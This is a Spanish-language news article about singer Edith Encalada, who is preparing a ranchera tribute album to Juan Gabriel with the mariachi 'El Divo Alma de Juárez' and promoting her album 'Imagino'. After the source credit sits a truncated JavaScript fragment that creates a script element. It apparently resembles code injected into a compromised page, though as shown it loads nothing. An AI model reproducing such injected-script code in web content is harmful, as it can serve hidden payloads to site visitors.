Edith Encalada prepara homenaje a Juan Gabriel

Nota Extraída del Diario de México / www.diariodemexico.com/

Por Óscar Reyes

Una de las mujeres que poco a poco se abre paso dentro de la música del regional mexi­cano es Edith Encalada, quien presenta “El farsante”, tema que será parte de un homenaje dedi­cado a Juan Gabriel y que interpretó al lado del marichi “El Divo Alma de Juárez”.

En entrevista con Diario de México, la artista destacó que desde niña siente gran admiración por el cantau­tor mexicano, a quien denomina como “El siempre eterno” debido a la influencia que han teni­do sus composiciones en ella.

“Estoy produciendo el disco con Guillermo Her­gal, quien dirigió a Juan Gabriel durante 11 años; es­toy con el mariachi ‘El Divo Alma de Juárez’, por lo que me siento muy contenta y privilegiada de poder contar con gente talentosa en este proyecto”, afirmó Encalada.

También comentó que las canciones del álbum se­rán en versión ranchera; cabe destacar que actual­mente “El farsante” se encuentra en plataformas digitales; en YouTube cuenta con más de 10 mil re­producciones.

El disco estará conformado con temas como “Amor eterno”, “Tarde”, “Me nace del corazón”, en­tre otras piezas musicales.

Nueva propuesta

A la par del homenaje para el cantautor, Encalada promociona “Entre el blues y el amor”, segundo sencillo que se desprende del disco “Imagino”, el cual cuenta con 11 temas autoría de la cantante y un cover de Armando Manzanero.

En ese sentido, la mexicana confesó que “el disco va dirigido al amor, a la fe y esperanza para las mujeres pueden salir siempre adelante.

Fuente: DDMX

var d=document;var s=d.createElement(‘script’);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares